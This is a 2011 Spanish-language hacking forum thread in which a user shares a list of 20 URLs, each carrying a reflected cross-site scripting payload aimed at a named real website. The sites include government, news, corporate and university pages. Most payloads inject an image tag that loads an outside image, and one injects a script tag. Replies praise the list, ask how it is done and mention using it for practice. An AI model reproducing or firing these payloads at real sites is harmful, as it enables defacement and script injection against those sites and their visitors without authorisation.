Bienvenido(a), Visitante. Por favor, ingresa o regístrate.
Cargando

Autor Tema: 20 Famosas websites vulnerables a Cross Site Scripting (XSS)  (Leído 2108 veces)

0 Usuarios y 1 Visitante están viendo este tema.

mrobles

  • Visitante
20 Famosas websites vulnerables a Cross Site Scripting (XSS)
« en: Septiembre 07, 2011, 12:14:34 am »
La mayoría de los sitios más grandes y famosos se encuentran para ser vulnerables a ataques XSS. Cross-site scripting (XSS) es un tipo de vulnerabilidad de la seguridad informática se encuentran típicamente en las aplicaciones web que permiten la inyección de código malicioso de usuarios de Internet en las páginas web visitadas por otros usuarios. Ejemplos de este tipo de código incluir código HTML y scripts del lado del cliente. Una explotación de cross-site scripting vulnerabilidad puede ser utilizada por atacantes para eludir los controles de acceso, tales como la política de mismo origen. Recientemente, las vulnerabilidades de este tipo han sido explotados para elaborar potentes ataques de phishing y vulnerabilidades del navegador. Cross-site scripting se refiere originalmente como CSS, aunque este uso ha sido descontinuado en gran medida.

Hacker con nombre en código "Invectus" lista de algunos sitios tan famosos con vulnerabilidad XSS que se enumeran a continuación:
1.) http://video.state.gov/en/search/img-srchttp-i55tinypiccom-witu7dpng-height650-width1000/Ij48aW1nIHNyYz0iaHR0cDovL2k1NS50aW55cGljLmNvbS93aXR1N2QucG5nIiBoZWlnaHQ9IjY1MCIgd2lkdGg9IjEwMDAiPg%3D%3D

2.) http://www.telegraph.co.uk/search/?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

3.) http://www.dsm.com/en_US/cworld/public/home/pages/searchResults.jsp?search-site=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&noMimimumKeywords=false

4.) http://www.schools.nsw.edu.au/psearch/ext/?refine=new&QueryText=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&Go.x=29&Go.y=25&Go=submit

5.) http://thetablet.co.uk/search.php?q=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

6.) http://www.scstatehouse.gov/cgi-bin/query.exe?first=FIRST&querytext=&category=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

7.) http://www.highered.tafensw.edu.au/vsearch/tafehigheredu/?QueryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

8.) http://www.mcdonalds.com/content/us/en/search/search_results.html?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

9.) http://www.watersportholland.nl/cgi-bin/watersportholland/zoeken.cgi?search=Vera&query=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E

10.) http://www.gpo.gov/fdsys/search/searchresults.action?st=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

11.) http://www.networkcomputing.com/sitesearch?sort=publishDate+desc&queryText=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E

12.) http://www.unc.edu/search/index.htm?q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&cx=014532668884084418890%3Ajyc_iub1byy&cof=FORID%3A10&ie=UTF-8&hq=inurl%3Adevnet.unc.edu

13.) http://cugir.mannlib.cornell.edu/search?querytext=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

14.) http://ieeexplore.ieee.org./search/freesearchresult.jsp?newsearch=true&queryText=.QT.%3E%3Cimg+src.EQ..QT.http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png.QT.+height.EQ..QT.650.QT.+width.EQ..QT.1000.QT.%3E&x=58&y=13

15.) http://vivo-vis.cns.iu.edu/vivo1/search?querytext=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E

16.) http://google.nyu.edu/search?site=NYUWeb_Main&client=NYUWeb_Main&output=xml_no_dtd&proxyreload=1&proxystylesheet=stern_frontend&sitesearch=www.stern.nyu.edu&q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&x=8&y=6

17.) http://ofa.fas.harvard.edu/cal/search.php?q=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

18.) http://www.uidaho.edu/search?q=%22%3E%3Cscript%3EInvectus%3C/script%3E&cof=FORID:9&cref=http://www.uidaho.edu/search?xml=1&ticks=634508915004972966

19.) https://vivo.ufl.edu/search?flag1=1&querytext=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E

20.) http://energy.gov/search/site/%22%3E%3Cimg%20src%3D%22http%3A//i55.tinypic.com/witu7d.png%22%20height%3D%22650%22%20width%3D%221000%22%3E

Fuente

ORIGINAL
Perdonen la traduccion pero tengo prisa

Desconectado denixxmen

  • Residente de Hack x Crack [L4]
  • ****
  • Mensajes: 296
  • un hacker se hace no nace
    • Ver Perfil
Re:20 Famosas websites vulnerables a Cross Site Scripting (XSS)
« Respuesta #1 en: Septiembre 07, 2011, 12:21:25 am »
como rayos hace eso eso es lo que quiero hacer pero oye ya vi su link y sube la url de la imagen :O
Si te caes siete veces, levántate ocho.
¡Caer está permitido. Levantarse es obligatorio!.
Dime y lo olvido, enséñame y lo recuerdo, involúcrame y lo aprendo.
hacer auditoria wireless no es robo es tomar prestada una señal que anda por ahi en el aire.


Desconectado Rock Lee

  • Administrador
  • *****
  • Mensajes: 1838
  • Hack x Crack es mi Hogar!
    • Ver Perfil
    • Hack x Crack
Re:20 Famosas websites vulnerables a Cross Site Scripting (XSS)
« Respuesta #2 en: Septiembre 07, 2011, 12:33:41 am »
 :o simplemente sin palabras ??? solo que muy buena la información mr0bles!


Desconectado elmesias36

  • Residente de Hack x Crack [L4]
  • ****
  • Mensajes: 299
    • Ver Perfil
Re:20 Famosas websites vulnerables a Cross Site Scripting (XSS)
« Respuesta #3 en: Septiembre 07, 2011, 08:43:22 am »
como rayos hace eso eso es lo que quiero hacer pero oye ya vi su link y sube la url de la imagen :O

Estudia estudia y estudia y lo lograras, muy buena info

Desconectado franky508

  • Moderador Global
  • *****
  • Mensajes: 1009
    • Ver Perfil
Re:20 Famosas websites vulnerables a Cross Site Scripting (XSS)
« Respuesta #4 en: Septiembre 07, 2011, 01:38:34 pm »
Muchas gracias mrobles por este post, seguro que le sirve a alguien ( a mi ) para practicar  ;D
Skype: fran.franky508
-El destino es el que baraja las cartas, pero nosotros somos los que jugamos.

PASAROS POR AQUÍ:
http://www.hackxcrack.es/forum/index.php?topic=17844.msg100112
http://www.hackxcrack.es/forum/index.php?topic=17515.0



Desconectado Epyon

  • Residente de Hack x Crack [L4]
  • ****
  • Mensajes: 254
    • Ver Perfil
Re:20 Famosas websites vulnerables a Cross Site Scripting (XSS)
« Respuesta #5 en: Septiembre 07, 2011, 05:18:24 pm »
Hasta la IEEE, ni una gran institución de investigación se escapo de ser Owneado xD.
Solo existen 10 tipos de personas, las que conocen el binario y las que no :).

Desconectado commandos

  • Ladrón de espacio en la BD [L0]
  • *
  • Mensajes: 40
    • Ver Perfil
Re:20 Famosas websites vulnerables a Cross Site Scripting (XSS)
« Respuesta #6 en: Septiembre 08, 2011, 12:22:42 am »
De los links que aparecen cabe destacar los de periódicos como el telegraph, pero también empresas tan potentes como McDonalds, Google o incluso webs del gobierno (.gov)
Sobre seguridad SSL

Desconectado tropicalextremo

  • Conociendo la comunidad [L2]
  • **
  • Mensajes: 81
    • Ver Perfil
Re:20 Famosas websites vulnerables a Cross Site Scripting (XSS)
« Respuesta #7 en: Septiembre 08, 2011, 01:42:12 am »
Que interesante robles.

Desconectado JULY

  • Éste es mi foro! [L6]
  • *****
  • Mensajes: 748
  • Inmutable
    • Ver Perfil
Re:20 Famosas websites vulnerables a Cross Site Scripting (XSS)
« Respuesta #8 en: Septiembre 08, 2011, 01:12:36 pm »
claro que es util
estaria bueno que hagas un tuto de xss
que te parece?
saludossssssssssssssssssssssss